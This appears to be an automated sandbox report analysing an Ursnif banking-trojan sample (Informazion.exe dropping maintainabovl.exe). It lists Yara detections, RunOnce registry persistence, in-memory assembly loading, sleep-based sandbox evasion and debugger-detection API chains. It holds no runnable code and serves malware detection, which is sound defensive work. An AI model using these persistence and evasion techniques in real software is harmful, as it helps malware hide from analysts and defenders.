Yara detected Costura Assembly Loader

Source: Yara match	File source: 1.2.maintainabovl.exe.3fd4590.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.c370000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.501526804.0000000003FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.508878561.000000000C370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: maintainabovl.exe PID: 5976, type: MEMORYSTR

.NET source code contains potential unpacker

Source: maintainabovl.exe.0.dr, Frm/Form1.cs	.Net Code: Heal System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.maintainabovl.exe.840000.0.unpack, Frm/Form1.cs	.Net Code: Heal System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 1_2_04C62430 push ds; retf	1_2_04C6243E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 1_2_04C60007 push ds; retf	1_2_04C6003E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 1_2_04C62A80 push ds; retf	1_2_04C62B7E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 1_2_04C62B70 push ds; retf	1_2_04C62B7E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_0109B352 pushfd ; ret	7_2_0109B361
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_0109825B push ecx; ret	7_2_0109826B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_01097E70 push ecx; ret	7_2_01097E79

Source: C:\Users\user\Desktop\Informazion.exe

Code function: 0_2_00007FF64C511D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,

0_2_00007FF64C511D28

Source: Informazion.exe

Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]

Source: C:\Users\user\Desktop\Informazion.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Informazion.exe

Code function: 0_2_00007FF64C511684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

0_2_00007FF64C511684

Source: C:\Users\user\Desktop\Informazion.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\Informazion.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\Informazion.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\Informazion.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR
Source: Yara match	File source: 1.2.maintainabovl.exe.2deb5a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2deb5a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e0cee0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e03a34.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2d6f3f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.maintainabovl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.maintainabovl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e03a34.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e0cee0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking system information)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe TID: 4740	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe TID: 6124	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5956	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe TID: 5108	Thread sleep count: 61 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe TID: 5108	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe TID: 5108	Thread sleep count: 67 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9433

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Informazion.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-2443

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Informazion.exe

Code function: 0_2_00007FF64C5164E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00007FF64C5164E4

Source: C:\Users\user\Desktop\Informazion.exe

Code function: 0_2_00007FF64C51204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

0_2_00007FF64C51204C

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

API call chain: ExitProcess graph end node

Source: maintainabovl.exe, 00000001.00000002.498084861.0000000000F34000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

Source: C:\Users\user\Desktop\Informazion.exe

0_2_00007FF64C511D28

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C518790 SetUnhandledExceptionFilter,		0_2_00007FF64C518790
